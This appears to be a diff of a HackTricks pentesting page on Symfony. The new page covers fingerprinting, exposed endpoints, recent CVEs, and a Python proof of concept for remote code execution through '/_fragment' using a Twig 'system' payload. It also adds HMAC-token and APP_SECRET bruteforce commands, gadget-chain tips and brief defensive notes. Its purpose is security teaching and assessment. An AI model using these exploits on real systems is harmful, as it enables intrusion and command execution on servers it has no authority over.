diff --git a/src/network-services-pentesting/pentesting-web/symphony.md b/src/network-services-pentesting/pentesting-web/symphony.md index 0debebc08..b7846e423 100644 --- a/src/network-services-pentesting/pentesting-web/symphony.md +++ b/src/network-services-pentesting/pentesting-web/symphony.md @@ -2,13 +2,127 @@ {{#include ../../banners/hacktricks-training.md}} -Take a look to the following posts: +Symfony is one of the most widely-used PHP frameworks and regularly appears in assessments of enterprise, e-commerce and CMS targets (Drupal, Shopware, Ibexa, OroCRM … all embed Symfony components). This page collects offensive tips, common mis-configurations and recent vulnerabilities you should have on your checklist when you discover a Symfony application. -- [**https://www.ambionics.io/blog/symfony-secret-fragment**](https://www.ambionics.io/blog/symfony-secret-fragment) -- [**hhttps://blog.flatt.tech/entry/2020/11/02/124807**](https://blog.flatt.tech/entry/2020/11/02/124807) -- [**https://infosecwriteups.com/how-i-was-able-to-find-multiple-vulnerabilities-of-a-symfony-web-framework-web-application-2b82cd5de144**](https://infosecwriteups.com/how-i-was-able-to-find-multiple-vulnerabilities-of-a-symfony-web-framework-web-application-2b82cd5de144) +> Historical note: A large part of the ecosystem still runs the **5.4 LTS** branch (EOL **November 2025**). Always verify the exact minor version because many 2023-2025 security advisories only fixed in patch releases (e.g. 5.4.46 → 5.4.50). +--- + +## Recon & Enumeration + +### Finger-printing +* HTTP response headers: `X-Powered-By: Symfony`, `X-Debug-Token`, `X-Debug-Token-Link` or cookies starting with `sf_redirect`, `sf_session`, `MOCKSESSID`. +* Source code leaks (`composer.json`, `composer.lock`, `/vendor/…`) often reveal the exact version: + ```bash + curl -s https://target/vendor/composer/installed.json | jq '.[] | select(.name|test("symfony/")) | .name,.version' + ``` +* Public routes that only exist on Symfony: + * `/_profiler` (Symfony **Profiler** & debug toolbar) + * `/_wdt/` (“Web Debug Toolbar”) + * `/_error/{code}.{_format}` (pretty error pages) + * `/app_dev.php`, `/config.php`, `/config_dev.php` (pre-4.0 dev front-controllers) +* Wappalyzer, BuiltWith or ffuf/feroxbuster wordlists: `symfony.txt` → look for `/_fragment`, `/_profiler`, `.env`, `.htaccess`. + +### Interesting files & endpoints +| Path | Why it matters | +|------|----------------| +| `/.env`, `/.env.local`, `/.env.prod` | Frequently mis-deployed → leaks `APP_SECRET`, DB creds, SMTP, AWS keys | +| `/.git`, `.svn`, `.hg` | Source disclosure → credentials + business logic | +| `/var/log/*.log`, `/log/dev.log` | Web-root mis-configuration exposes stack-traces | +| `/_profiler` | Full request history, configuration, service container, **APP_SECRET** (≤ 3.4) | +| `/_fragment` | Entry point used by ESI/HInclude. Abuse possible once you know `APP_SECRET` | +| `/vendor/phpunit/phpunit/phpunit` | PHPUnit RCE if accessible (CVE-2017-9841) | +| `/index.php/_error/{code}` | Finger-print & sometimes leak exception traces | + +--- + +## High-impact Vulnerabilities (2023-2025) + +### 1. APP_SECRET disclosure ➜ RCE via `/_fragment` (aka “secret-fragment”) +* **CVE-2019-18889** originally, but *still* appears on modern targets when debug is left enabled or `.env` is exposed. +* Once you know the 32-char `APP_SECRET`, craft an HMAC token and abuse the internal `render()` controller to execute arbitrary Twig: + ```python + # PoC – requires the secret + import hmac, hashlib, requests, urllib.parse as u + secret = bytes.fromhex('deadbeef…') + payload = "{{['id']|filter('system')}}" # RCE in Twig + query = { + 'template': '@app/404.html.twig', + 'filter': 'raw', + '_format': 'html', + '_locale': 'en', + 'globals[cmd]': 'id' + } + qs = u.urlencode(query, doseq=True) + token = hmac.new(secret, qs.encode(), hashlib.sha256).hexdigest() + r = requests.get(f"https://target/_fragment?{qs}&_token={token}") + print(r.text) + ``` +* Excellent write-up & exploitation script: Ambionics blog (linked in References). + +### 2. Windows Process Hijack – CVE-2024-51736 +* The `Process` component searched the current working directory **before** `PATH` on Windows. An attacker able to upload `tar.exe`, `cmd.exe`, etc. in a writable web-root and trigger `Process` (e.g. file extraction, PDF generation) gains command execution. +* Patched in 5.4.50, 6.4.14, 7.1.7. + +### 3. Session-Fixation – CVE-2023-46733 +* Authentication guard reused an existing session ID after login. If an attacker sets the cookie **before** the victim authenticates, they hijack the account post-login. + +### 4. Twig sandbox XSS – CVE-2023-46734 +* In applications that expose user-controlled templates (admin CMS, email builder) the `nl2br` filter could be abused to bypass the sandbox and inject JS. + +### 5. Symfony 1 gadget chains (still found in legacy apps) +* `phpggc symfony/1 system id` produces a Phar payload that triggers RCE when an unserialize() happens on classes such as `sfNamespacedParameterHolder`. Check file-upload endpoints and `phar://` wrappers. + +{{#ref}} +../../pentesting-web/deserialization/php-deserialization-+-autoload-classes.md +{{#endref}} + +--- + +## Exploitation Cheat-Sheet + +### Calculate HMAC token for `/_fragment` +```bash +python - <<'PY' +import sys, hmac, hashlib, urllib.parse as u +secret = bytes.fromhex(sys.argv[1]) +qs = u.quote_plus(sys.argv[2], safe='=&') +print(hmac.new(secret, qs.encode(), hashlib.sha256).hexdigest()) +PY deadbeef… "template=@App/evil&filter=raw&_format=html" +``` + +### Bruteforce weak `APP_SECRET` +```bash +cewl -d3 https://target -w words.txt +symfony-secret-bruteforce.py -w words.txt -c abcdef1234567890 https://target +``` + +### RCE via exposed Symfony Console +If `bin/console` is reachable through `php-fpm` or direct CLI upload: +```bash +php bin/console about # confirm it works +php bin/console cache:clear --no-warmup +``` +Use deserialization gadgets inside the cache directory or write a malicious Twig template that will be executed on the next request. + +--- + +## Defensive notes +1. **Never deploy debug** (`APP_ENV=dev`, `APP_DEBUG=1`) to production; block `/app_dev.php`, `/_profiler`, `/_wdt` in the web-server config. +2. Store secrets in env vars or `vault/secrets.local.php`, *never* in files accessible through the document-root. +3. Enforce patch management – subscribe to Symfony security advisories and keep at least the LTS patch-level. +4. If you run on Windows, upgrade immediately to mitigate CVE-2024-51736 or add a `open_basedir`/`disable_functions` defence-in-depth. + +--- + +### Useful offensive tooling +* **ambionics/symfony-exploits** – secret-fragment RCE, debugger routes discovery. +* **phpggc** – Ready-made gadget chains for Symfony 1 & 2. +* **sf-encoder** – small helper to compute `_fragment` HMAC (Go implementation). + + + +## References +* [Ambionics – Symfony “secret-fragment” Remote Code Execution](https://www.ambionics.io/blog/symfony-secret-fragment) +* [Symfony Security Advisory – CVE-2024-51736: Command Execution Hijack on Windows Process Component](https://symfony.com/blog/cve-2024-51736-command-execution-hijack-on-windows-with-process-class) {{#include ../../banners/hacktricks-training.md}} - - -